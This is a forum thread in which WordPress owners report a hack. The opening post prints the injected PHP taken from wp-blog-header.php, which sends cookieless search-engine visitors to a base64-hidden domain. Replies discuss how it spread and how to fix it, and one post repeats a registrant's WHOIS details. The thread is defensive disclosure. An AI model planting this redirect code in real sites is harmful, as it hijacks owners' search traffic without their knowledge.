WORDPRESS HACK - hacker redirect SE traffic to his site

[lijgeo]

Hi,


anyone noticed huge drop in traffc without any chage in SERP !!

Using wordpress?

then read on!!

then your wordpress is hacked. check your wp-blog-header.php file.

hacker redirectes SE traffic visitors to his site it there is no past cookie set on his site !!!


my wp header file looked like this

Quote:

<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php

if (! isset($wp_did_header)):
if ( !file_exists( dirname(__FILE__) . '/wp-config.php') ) {
if ( strstr( $_SERVER['PHP_SELF'], 'wp-admin') ) $path = '';
else $path = 'wp-admin/';

require_once( dirname(__FILE__) . '/wp-includes/functions.php');
wp_die("There doesn't seem to be a <code>wp-config.php</code> file. I need this before we can get started. Need more help? <a href='http://codex.wordpress.org/Editing_wp-config.php'>We got it</a>. You can <a href='{$path}setup-config.php'>create a <code>wp-config.php</code> file through a web interface</a>, but this doesn't work for all server setups. The safest way is to manually create the file.", "WordPress &rsaquo; Error");
}

$wp_did_header = true;

require_once( dirname(__FILE__) . '/wp-config.php');

wp();
gzip_compression();

require_once(ABSPATH . WPINC . '/template-loader.php');

endif;

?>

Check whether your header file is like this and chage iif its hacked!!

its redirecting to anyresults.net

whois info of that domain .


Administrative Contact:
N/A
Doren Arnold ()
96 Mowat Ave
Toronto
3553,M6K 3M1
US
Tel. +1.416545545




check immediately and fix if you have this problem. i think we should report this in wp community forum and webhosting of that site

[trocobob]

was you header chmodded 777 ?

[frank.jung]

You need to give us more details than that.

Sorry for your luck but I am assuming you are the only one with this issue.

[Scripter]

As far as I know it's a hack of the wp-config and there is no official fix so far, it even works with the latest WP version. It redirects all traffic from google, but just from google, if you have bookmarked your site and access it, everything looks normal.

It's a widespread problem at the moment and certainly so single incident.

[Mudra]

Traffic to my sites has also decreased but no such coding is in my header.php
Please give some more details.

[Scripter]

Look in your .htaccess, it has a referrer based redirect if you were hacked as far as I know.

[webjaws]

Its not a single incident!!! I had the problem in 2 of my wordpress sites!! A loss of huge traffic...!!! JUST FIXED IT...!! It must be reported to WP community! How such hacks occurs to the xtreme secure WP??

Its redirecting to its redirecting to anyresults.net

We will see more users with the problem soon!!!

Any FIXES available to this hack? How can we prevent?

[lijgeo]

see

http://forums.digitalpoint.com/showthread.php?t=863502



there are so many out there

not a single incident !!

[lijgeo]

see


http://wordpress.org/support/topic/180938

http://forums.digitalpoint.com/showthread.php?p=8030426


http://forums.digitalpoint.com/showthread.php?p=8039322

just give a search on google using anyresults.net !!

a new 302 hack


see


http://wordpress.org/support/topic/1...=2#post-770581

[nastynappy]

er.. but how did your wp-blog-header.php changed??
does anyone else have the access to edit your files?
who edited your wp-blog-header.php ?

[godsofchaos]

Whoa! Thanks for letting us know. Thankfully, I am so far so good.... Gotta watch out for this prick!!!

[sweetfunny]

He's hit a lot of sites, check out the Alexa graph...

http://www.alexa.com/data/details/tr...results.net?q=

#32,833 in 13 days, compare his traffic to Digitalpoint.

[lijgeo]

just see the inctrese in traffic within 1 month

So its the proof that he hacked so many sites !!

is there anything we can do against him?

Quote:

Originally Posted by sweetfunny

He's hit a lot of sites, check out the Alexa graph...

http://www.alexa.com/data/details/tr...results.net?q=

#32,833 in 13 days, compare his traffic to Digitalpoint.

[chandan123]

any update for this matter ?

#32,833 in 13 days, compare his traffic to Digitalpoint.

[nastynappy]

hello.. will anyone tell me how their wp-blogheader file get edited?
why do u guys give permission to other user to use ur files ?

[lijgeo]

i think its beacuse of some bug in old WP

Quote:

Originally Posted by nastynappy

hello.. will anyone tell me how their wp-blogheader file get edited?
why do u guys give permission to other user to use ur files ?

[bbrian017]

wow this is crazy hehehe

[AlfaGTV]

Damned, I just checked all my blogs. Found one that had some weird encrypted javascript code in the wp-blog-header.php file. It was causing a redirect. I just deleted all files and did a new wordpress installation. This blog did 500 uniques average / day in may. Most traffic coming from google, last 2 weeks only 50 uv's/day. I feel really gutted about this, I've spent a lot of time recently trying to write some good unique content on this blog.

[falguni1]

http://forums.digitalpoint.com/showthread.php?t=899445

I am facing problem on my wordpress site, should I change to blogger and use their software.

[lijgeo]

no need replace wp-blog-header.php with a fresh file of installation

Quote:

Originally Posted by falguni1

http://forums.digitalpoint.com/showthread.php?t=899445

I am facing problem on my wordpress site, should I change to blogger and use their software.